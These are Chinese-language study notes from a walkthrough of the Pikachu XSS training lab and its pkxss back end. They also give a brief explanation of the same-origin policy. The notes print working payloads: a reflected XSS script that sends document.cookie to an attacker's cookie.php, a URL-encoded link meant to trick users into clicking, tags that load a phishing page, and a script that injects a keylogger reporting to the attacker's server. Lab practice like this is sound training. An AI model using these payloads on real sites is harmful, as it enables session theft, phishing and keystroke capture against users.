xss后台的安裝
重定向到另一個可信網址 讓點擊者 不知情
1.cookie值獲取
查看源代碼
在反射型xss(get)頁面下使用
<script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>
點提交,會跳轉到首頁,
http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+++%2B++document.cookie%3B+%3C%2Fscript%3E&submit=submit
欺騙用戶去點擊
就會出現第二個
反射型xss(get)
讓用戶去點擊這個頁面 獲取cookie值
2.釣魚結果
<img src=" http://192.168.50.100/pkxss/xfish/fish.php" /> img標簽
<script src=" http://192.168.50.100/pkxss/xfish/fish.php"> </script> script標簽
彈窗 輸入信息 ,
釣魚結果中就會顯示
什么是同源策略
兩個頁面地址中的協議,域名,端口號一致,則表示同源
為什么瀏覽器要使用同源策略
設置同源策略的主要目的是為了安全,如果沒有同源限制,在瀏覽器中的cookie等其他數據可以任意讀取,不同域下的DOM任意操作,ajax任意請求其他網站的數據,包括隱私數據。
3.鍵盤記錄
過來的post 數據 都會存到數據庫當中
* 允許所有的源被訪問
再傳到 這里 顯示
rk.js文件對用戶的鍵盤輸入 進行獲取 賦值給realkey 然后發送到攻擊者的后台
<script src=" http://192.168.50.254/pikachu-master/pkxss/xkeypress/rk.js"> </script> script標簽